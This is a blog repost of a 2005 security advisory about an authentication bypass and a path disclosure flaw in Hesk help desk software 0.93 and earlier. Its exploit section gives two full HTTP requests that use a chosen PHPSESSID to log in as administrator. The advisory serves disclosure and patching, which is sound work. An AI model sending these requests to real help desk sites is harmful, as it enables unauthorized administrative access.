News from the Lab: Hesk Session ID Validation Vulnerability

Monday, October 16, 2006

Hesk Session ID Validation Vulnerability

OS2A ID: OS2A_1003 Status
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released

Class: Authentication Bypass Severity: CRITICAL

Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused due to improper validation of the HTTP
header. This vulnerability can be exploited to bypass authentication
mechanism, and also made to reveal system specific information.

Description:
Multiple vulnerabilities exist in Hesk ticket based support system.

1. Authentication Bypass
The 'PHPSESSID', Session ID parameter in the HTTP header is not properly
validated. A malicious user can log in to the Administrator account by
sending a random value to 'PHPSESSID' parameter and posting it to
admin.php. This Session ID can then be utilized to access administrative
control panel.

This is similar to a previously reported vulnerability where invalid
User ID and Password were submitted. In this case, a randomly chosen
Session ID is sent along with the login request.

2. Path Disclosure.
Path information can be made to disclose in error pages by passing invalid
metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.

Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345")

Solution:
 Patch:
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR Hesk 0.93.1 from
http://www.phpjunkyard.com/free-helpdesk-software.php

Reference:

http://seclists.org/bugtraq/2005/Sep/0242.html

posted by Rahul @ 5:53 PM

0 Comments:

Post a Comment

<< Home